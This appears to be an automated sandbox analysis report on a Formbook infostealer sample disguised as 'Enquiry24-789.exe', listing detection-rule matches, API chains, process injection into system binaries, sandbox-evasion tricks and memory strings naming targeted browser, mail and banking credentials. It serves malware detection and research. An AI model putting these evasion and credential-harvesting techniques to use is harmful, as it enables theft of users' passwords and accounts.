Source: 00000005.00000002.3274079097.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3272504977.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3273598788.00000000010D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2482519007.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2481598921.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2481123443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3274021338.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@4/4
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C437B5 GetLastError,FormatMessageW, 0_2_00C437B5
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C310BF AdjustTokenPrivileges,CloseHandle, 0_2_00C310BF
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00C316C3
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00C451CD
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C5A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00C5A67C
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_00C4648E
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00BD42A2
Source: C:\Users\user\Desktop\Enquiry24-789.exe File created: C:\Users\user\AppData\Local\Temp\autE733.tmp Jump to behavior
Source: Enquiry24-789.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: sdchange.exe, 00000005.00000002.3272888173.0000000002A70000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3272888173.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2816972696.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3272888173.0000000002A4D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Enquiry24-789.exe ReversingLabs: Detection: 44%
Source: unknown Process created: C:\Users\user\Desktop\Enquiry24-789.exe "C:\Users\user\Desktop\Enquiry24-789.exe"
Source: C:\Users\user\Desktop\Enquiry24-789.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Enquiry24-789.exe"
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
Source: C:\Windows\SysWOW64\sdchange.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Enquiry24-789.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Enquiry24-789.exe" Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe" Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\sdchange.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Enquiry24-789.exe Static file information: File size 1323520 > 1048576
Source: Enquiry24-789.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Enquiry24-789.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Enquiry24-789.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Enquiry24-789.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Enquiry24-789.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Enquiry24-789.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Enquiry24-789.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: sdchange.pdbGCTL source: svchost.exe, 00000002.00000003.2446693880.0000000003224000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446571573.000000000321B000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000003.2581472565.00000000007CB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FNvzpsCDjtsg.exe, 00000004.00000002.3273453544.0000000000D2E000.00000002.00000001.01000000.00000005.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3273224995.0000000000D2E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: Enquiry24-789.exe, 00000000.00000003.2039029012.0000000004040000.00000004.00001000.00020000.00000000.sdmp, Enquiry24-789.exe, 00000000.00000003.2039230118.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2249246087.0000000005000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.000000000559E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.0000000005400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258256121.0000000005200000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3274369263.0000000004640000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2486058384.00000000042D0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3274369263.00000000047DE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2498182919.000000000448C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Enquiry24-789.exe, 00000000.00000003.2039029012.0000000004040000.00000004.00001000.00020000.00000000.sdmp, Enquiry24-789.exe, 00000000.00000003.2039230118.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2249246087.0000000005000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.000000000559E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.0000000005400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258256121.0000000005200000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000005.00000002.3274369263.0000000004640000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2486058384.00000000042D0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3274369263.00000000047DE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2498182919.000000000448C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: sdchange.exe, 00000005.00000002.3274878431.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3272888173.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3274520799.000000000315C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2954922095.000000001170C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: sdchange.exe, 00000005.00000002.3274878431.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3272888173.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3274520799.000000000315C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2954922095.000000001170C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: sdchange.pdb source: svchost.exe, 00000002.00000003.2446693880.0000000003224000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446571573.000000000321B000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000003.2581472565.00000000007CB000.00000004.00000001.00020000.00000000.sdmp
Source: Enquiry24-789.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Enquiry24-789.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Enquiry24-789.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Enquiry24-789.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Enquiry24-789.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BD42DE
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF0A76 push ecx; ret 0_2_00BF0A89
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041F8C8 pushad ; iretd 2_2_0041F8C9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004480B5 push ecx; ret 2_2_004480C8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040D900 pushad ; iretd 2_2_0040D906
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040E99F push edi; retf 2_2_0040E9A3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040DA28 push A93656ADh; ret 2_2_0040DA39
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403B28 push eax; ret 2_2_00403B2A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041938D push es; retf 2_2_004193A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418456 push ss; iretd 2_2_00418457
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004195C4 push edi; retf 2_2_004195C5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004165AB push esi; iretd 2_2_004165B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00408DBC push 4D2078E9h; iretd 2_2_00408DCE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00419676 push ecx; ret 2_2_00419677
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041EEFB push esp; iretd 2_2_0041EF11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00423E87 push esi; retf 2_2_00423E8B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00423EB3 push eax; ret 2_2_00423EB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041EF28 push esp; ret 2_2_0041EF29
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041AF32 push ebp; retf 2_2_0041AF6E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054027FA pushad ; ret 2_2_054027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0540225F pushad ; ret 2_2_054027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054309AD push ecx; mov dword ptr [esp], ecx 2_2_054309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0540283D push eax; iretd 2_2_05402858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05401365 push eax; iretd 2_2_05401369
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046427FA pushad ; ret 5_2_046427F9
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0464225F pushad ; ret 5_2_046427F9
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0464283D push eax; iretd 5_2_04642858
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046709AD push ecx; mov dword ptr [esp], ecx 5_2_046709B6
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0256035C push esi; retf 5_2_02560360
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02552342 push esp; retf 5_2_02552343
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02560388 push eax; ret 5_2_02560389
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_025627D4 push es; ret 5_2_025627D5
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BEF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00BEF98E
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C61C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00C61C41
Source: C:\Users\user\Desktop\Enquiry24-789.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found API chain indicative of sandbox detection
Source: C:\Users\user\Desktop\Enquiry24-789.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\Enquiry24-789.exe API/Special instruction interceptor: Address: 2383254
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0547096E rdtsc 2_2_0547096E
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Enquiry24-789.exe API coverage: 3.8 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\sdchange.exe API coverage: 2.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\sdchange.exe TID: 5556 Thread sleep count: 58 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe TID: 5556 Thread sleep time: -116000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe TID: 4480 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\sdchange.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\sdchange.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00C3DBBE
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C0C2A2 FindFirstFileExW, 0_2_00C0C2A2
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C468EE FindFirstFileW,FindClose, 0_2_00C468EE
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00C4698F
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C3D076
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C3D3A9
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C49642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C49642
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C4979D
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C49B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00C49B2B
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C45C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00C45C97
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0255C3F0 FindFirstFileW,FindNextFileW,FindClose, 5_2_0255C3F0
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BD42DE
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A84000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
Source: -NG6N06.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: -NG6N06.5.dr Binary or memory string: discord.comVMware20,11696428655f
Source: -NG6N06.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: -NG6N06.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: global block list test formVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: -NG6N06.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A84000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: address_1VARCHARVMware
Source: -NG6N06.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
